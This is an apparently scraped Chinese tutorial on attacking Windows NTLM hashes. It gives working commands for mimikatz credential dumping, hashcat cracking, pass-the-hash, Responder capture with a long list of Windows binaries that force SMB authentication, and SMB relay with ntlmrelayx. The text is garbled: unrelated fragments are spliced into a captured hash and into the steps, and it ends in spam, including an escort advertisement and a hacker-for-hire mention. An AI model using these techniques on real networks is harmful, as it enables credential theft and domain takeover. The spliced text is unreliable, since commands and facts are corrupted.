本文从hash获取 *** ,爆炸hash,hash中转,中继等方面全面剖析,以直观详细的实践来了解进犯进程,进程比较详细,请耐性观看。
0x02 什么是NTLM-hash、net NTLM-hash
NTLM hash是windows登录暗码的一种hash,可从Windows系统中的SAM文件和域控的NTDS.dit文件中取得全部用户的hash(比方用Mimikatz提取),获取该hash之后,可进行爆炸明文、哈希传递(PtH进犯),
Net-NTLM的hash是根据NTLM的hash值经过必定的算法发作的,获取Net-NTLM的hash之后,可进行爆炸明文、运用 *** b进行中继进犯,该hash不能进行哈希传递进犯。
什么是NTLM hash?
NTLM hash的生成 *** :
1、将明文口令转换成十六进制的格局
2、把十六进制转换成Unicode格局,每个字节之后增加0x00
3、再对Unicode字符串作MD4加密,生成32位的十六进制数字串
这儿我经过mimikat *** 西先直观的了解NTLM hash,mimikatz直接从 lsass.exe 里获取windows处于active状况账号明文暗码,以windows server2012为例:
从上图发现:
NTLM hash:A1E33A2281B8C6DBC2373BFF87E8CB6E
明文暗码:123456Abc
0x03 对NTLM hash暴力破解
假如经过其它途径取得此hash,即A1E33A2281B8C6DBC2373BFF87E8CB6E,可用hashcat进行字典暴力破解,Hashcat参数如下:
hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force
参数阐明:
-m 挑选哈希类别,1000为NTLM
-o 输出破解成功的明文
example.dict 明文字典
翻开out.txt,发现明文123456Abc
留意:
因为windows server2012 r2、windwos 8.1以及更高版别都做了加固,即制止明文缓存到内存,而mimikatz是根据内存获取明文暗码,则无法直接经过mimikatz获取明文暗码,直接提取成果为“null”,但可经过修正注册表来获取。
参看
受维护用户 ( Protected Users )
http://www.bubuko.com/infodetail-2077149.html
0x04 NTLM哈希传递
哈希传递浅显来讲,便是不需求明文登录,用NTLM hash可直接进行登录。
在我们运用某服务时,Windows会带上本身的认证信息进行检验登录,这个认证信息其实便是Net-NTLM的Hash,我们运用哪些服务会让Windows带上本身认证信息登录?如访问 *** b同享文件夹等,此刻会运用认证信息检验登录,而且调用lsass内存中的hash缓存检验登录,此刻运用mimikatz等东西修正缓存的hash为获取得到的hash,然后运用修正的hash进行登录,这是哈希传递的原理。文章后边讲到的获取Net-NTLM的hash,其实便是运用带认证信息访问 *** b,如让处理员访问此wdb:<img src="192.168.191.129xx">
,192.168.191.129被进犯者操控的一台内网PC,可获取处理员的Net-NTLM hash。
先讲下认证恳求进程:
1、客户端先对在本地对暗码加密成为暗码散列
2、客户端发送认证恳求,即发作明文账号
3、服务器回来一个16位的随机数字发送给客户端,作为一个 challenge
4、客户端再用进程1的暗码散列来加密这个 challenge ,作为 response回来给服务器。
5、服务器把用户名、给客户端的challenge 、客户端回来的 response ,发送域操控器
6、域操控器运用此用户名在SAM暗码处理库的暗码散列,加密给客户端的challenge
7、与进程4客户端加密的challenge比较,假如两个challenge共同,认证成功
哈希传递缝隙发作在进程4中,直接运用修正缓存后的hash,进行challenge加密,对challenge 加密的hash现已不是发送账号对应的hash,而是进犯者经过其他途径获取的hash进行challenge加密。
Pth进犯演示:
靶机ip:
进犯机ip:
假定现已取得NTLM hash:
处理员身份运转mimikatz:
mimikatz履行指令参数:
sekurlsa::pth /user:Ancert /domain:WIN-0HE0PTAL9L4 /ntlm:A1E33A2281B8C6DBC2373BFF87E8CB6E
此刻再进行其它认证操作,可直接用获取的方针hash进行登录认证。
0x05 Net-NTLM hash获取
Net-NTLM hash不能直接获取,经过Responder东西进行阻拦获取,此hash不能进行哈希传递,但可进行中继转发,运用Responder等中间人东西,结合其它东西可自动化进行阻拦获取并中继转发,其它东西如 Impacket的ntlmrelayx.py进行中继转发。
在进犯机上运转Responder,此刻进犯机模仿为 *** B服务让受害者进行认证登录,经过设置几个模仿的歹意看护进程(如SQL服务器,FTP,HTTP和 *** B服务器等)来直接提示凭证或模仿质询 – 呼应验证进程并捕获客户端发送的必要 hash,当受害者机器检验登陆进犯者机器,responder就能够获取受害者机器用户的NTLMv2哈希值。。
Responder下载安装:
https://github.com/lgandx/Responder
Responder操作演示
客户端IP:
进犯机IP:
1、 无需修正Responder.conf,因为此刻 *** B、HTTP服务不要封闭,等中继进犯时才封闭这两个服务。因而这儿先演示Responder怎样获取net-NTLM hash,在中继进犯里封闭 *** B、HTTP,是因为此刻不再由Responder获取hash,而是直接让ntlmrelayx.py来结束这一使命。
2、 进犯机履行 python Responder.py -I eth0,此刻处于监听状况
3、 运用 *** B协议,客户端在联接服务端时,默许先运用本机的用户名和暗码hash检验登录,所以能够模仿 *** B服务器然后截获hash,履行如下指令都能够得到hash。
客户端履行如下指令,进犯机的Responder能收到。
> net.exe use hostshare > attrib.exe hostshare > bcdboot.exe hostshare > bdeunlock.exe hostshare > cacls.exe hostshare > certreq.exe hostshare #(noisy, pops an error dialog) > certutil.exe hostshare > cipher.exe hostshare > ClipUp.exe -l hostshare > cmdl32.exe hostshare > cmstp.exe /s hostshare > colorcpl.exe hostshare #(noisy, pops an error dialog) > comp.exe /N=0 hostshare hostshare > compact.exe hostshare > control.exe hostshare > convertvhd.exe -source hostshare -destination hostshare > Defrag.exe hostshare > diskperf.exe hostshare > dispdiag.exe -out hostshare > doskey.exe /MACROFILE=hostshare > esentutl.exe /k hostshare > expand.exe hostshare > extrac32.exe hostshare > FileHistory.exe hostshare #(noisy, pops a gui) > findstr.exe * hostshare > fontview.exe hostshare #(noisy, pops an error dialog) > fvenotify.exe hostshare #(noisy, pops an access denied error) > FXSCOVER.exe hostshare #(noisy, pops GUI) > hwrcomp.e建议配备xe -check hostshare > hwrreg.exe hostshare > icacls.exe hostshare > licensingdiag.exe -cab hostshare > lodctr.exe hostshare > lpksetup.exe /p hostshare /s > makecab.exe hostshare > msiexec.exe /update hostshare /quiet > msinfo32.exe hostshare #(noisy, pops a "cannot open" dialog) > mspaint.exe hostshare #(noisy, invalid path to png error) > msra.exe /openfile hostshare #(noisy, error) > mstsc.exe hostshare #(noisy, error) > netcfg.exe -l hostshare -c p -i foo
客户端履行 net use 192.168.191.131aaa
4、 进犯机成功收到NTLMv2-SSP Hash
Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000
爆炸net-NT
LM hash持续用hashcat进行hash爆炸,Hashcat参数如下:
hashcat64.exe -m 5600 Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0上面这段PowerShell代码段运用了WMI来枚举全部的EXE和DLL。之所以挑选这种 *** ,而不挑选Get-ChildItem,是因为它在检验访问其无权访问的文件时,有或许引发失常。653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000 example.dict -o out.txt --force
参数阐明:
-m 挑选哈希类别,5600为net-NTLM
成功破解出明文暗码,如下图:
翻开out.txt,发现破解出明文123456Abc
0x06 *** B中继进犯
前面文章说过了,当获取到net-NTLM hash之后,因为不能经过相似哈希传递的修正缓存hash进行认证,此hash无法进行哈希传递,怎样进行进犯呢?可经过Responder东西阻拦处理员的net-NTLM hash,合作ntlmrelayx.py进行中继转发。
Impacket下载:
git clone https://github.com/CoreSecurity/impacket.git
进行中继条件:方针 *** B签名需求封闭,在 *** B联接中,需求运用安全机制来维护服务器和客户端之间传输数据的完整性,而这种安全机制便是 *** B签名和加密,假如封闭 *** B签名,会答应进犯者阻拦认证进程,而且将取得hash在其他机器上进行重放,,然后取得域管权限。
现在 *** B常用来做为 *** B文件同享、打印机,假如签名封闭,或许导致文件同享、打印机被侵略。
比方我用虚拟机建立的 *** B文件同享如下,详细认证登录进程文章前面部分已讲过,看看这个作用:
虚拟机IP:192.168.191.139
先勘探方针是否已封闭 *** B签名,指令如下:
nmap --script *** b-security-mode.nse -p445 192.168.191.139 --open
如下是我用虚拟机建立的域控环境测验,中继转发操作:
域内普通用户-受害者机器(win7)
域处理员(administrator)机器(windows server 2012 r2)
kali linux 进犯者机器
1、Responder封闭 *** B、HTTP
1.进入的带外ICMP差错消息将匹配规则;[1][2][3][4][5]黑客接单网
2、履行python Responder.py -I eth0 -r -d –w
3、履行python ntlmrelayx.py -tf targets.txt -socks - *** b2support
阐明 :
targets.txt内容为域内受害IP 192.168.191.139
python ntlmrelayx.py -t 192.168.191.139 -socks - *** b2support //
4、域管模仿输入一个同享,生成一个LLMNR恳求
5、经过Responder发送
6、NTLMv2哈希凭证被中继
进犯流程总结:
1、封闭Responder的 *** B和HTTP服务, 运转Responder东西来截取Net-NTLM哈希值
2、运转ntlmrelayx.
------b)security adminstrators 可处理服务器的登录。
py脚本,将Net-NTLM哈希值发送到ntlmrelayx.py脚本的 *** B和HTTP服务3、ntlmrelayx.py将hash发送到方针列表中,假如中继操作履行成功会触发告诉指令。
这儿先大约了解下中继转发的原理基础,鄙人一篇会结合DeathStar和Empire,演示自动化域浸透,以及对net NTLM-hash的运用。
本文由安全客原创发布
课程参谋:内网浸透——针对hash的进犯
获取项目源码:运用Elcomsoft系统恢复东西 *** 一个可发起的Windows PE闪存2.Kerberoasting可是只需一条指令即可“Net Use /Delete %computername%”内网渗透——针对hash的攻击
课程顾问那么我们该怎样进行app缝隙的开掘呢?首要,关于从web安全转战移动端缝隙开掘的安全工作者而言,当然想挖一挖和自己地址领域比较邻近的缝隙,而app的服务端底子和web安全领域的服务端差不多,只是web程序它的客户端更多的是浏览器,而移动运用它一般都有一个能够设备在移动设备上的app程序。所以,关于app服务端缝隙的开掘上面,我们照样能够仰仗以往的web阅历,对其间的一些xss,ssrf,sql注入,任意文件读取等缝隙进行开掘。只是只是带手机在外面逛了一圈,还来不及发挥任何操作,信息就现已暴露了。信赖我们心里免不了有一丝严重,也必定猎奇,这个小小的“智能盒子”究竟是怎样结束他的这些功用的?我们一同来看看。1、NTFS文件系统中的时间特色参看来历:https://firewalld.org/documentation/
然后运用gcc编译demo.c文件,并进步编译文件的SUID权限。SetSPN进一步的谷歌搜索之后,我在StackOverFlow上找到了替代 *** ,Android 4.4(katkat)能够将蓝牙数据包记载在一个文件中,我深化了解了一下,发现需求启用开发者方式,联接蓝牙设备然后交互,全部记载将会被记载到SD卡中的“btsnoop_hci”文件中。用如下指令编译课程顾问
我们先来看看,运用程序中的类都有哪些。
--- 000 0内网渗透——针对hash的攻击
课程顾问NTSTATUS TriggerPoolOverflow(IN PVOID UserBuffer, IN SIZE_T Size) {在这一部分中,我们选取了10款有代表性的勒索软件,下面我们将逐个研讨它们用到的加密 *** 。关于智能锁安全,用户需求了解的两个不安全概念? -M, --make *** 咖啡
mkdir("./upload");# 不答应空暗码课程顾问
try {美国国土安全部,对加利福尼亚州一个涉嫌儿童色情的案件的查询;内网渗透——针对hash的攻击
设备虚拟机客户东西的 *** 并没有很大改动,在最新的Vmware(Workstation和Fusion)以及VirtualBox中都能够正常作业。import netaddr
黑客首要先运用一个“at”指令传达一个后门程序
0x01 无缺的运用链PS C:> Get-ServiceFilePermission
本文标题:课程参谋:内网浸透——针对hash的进犯
本文目录一览: 1、黑客与骇客、红客的区别 2、黑客和骇客有啥子区别吗? 3、黑客帝国中的武器单品 黑客与骇客、红客的区别 “红客”词源来源于黑客,在中国,红色有着特定的价值含义,正义、道德...
本溪水洞 本溪水洞,国家AAAAA级旅游景区。本溪水洞位于辽宁省本溪市东北35公里处。 锦州笔架山 辽宁锦州笔架山坐落在笔架山风景区内,位于我国辽宁省西部 青山沟 青山沟位于...
一般羊驼我见过最自制的4000一只 可是是在澳大利几多亚 运返国运费会很贵吧 好一点的羊驼要6万阁下吧 农场主一般会一次卖给你两只羊驼 一只太孑立了 对羊驼欠好 一般都。 你好,羊驼价值在20...
7月21日信息,为提升直播电商行业发展点评科学研究,推动直播电商业态创新身心健康发展趋势,浙江网络技术推动管理中心协同浙江省国际性网络技术研究所、杭州市脸朝网络科技有限责任公司等科学研究组织和大数...
每日要闻去年9月,我丈夫出差,遇到了开餐馆的老人。那女人30多岁。她有三个男朋友,但没有嫁给她。她经常在朋友圈里寄一些自画像。我丈夫和她的两个微信互动非常火爆,但他总是记得删除聊天记录。 如何远程监...
“伴游什么网页-【郑娣】” 春夏秋冬2017的伴游旅行期待:约会美女,留住美好的一天。享受人生,快乐每一天。青岛商务联系方式会根据他们的公司提供:.商务男装模特招聘了,要求形象好气质佳,平时就是试...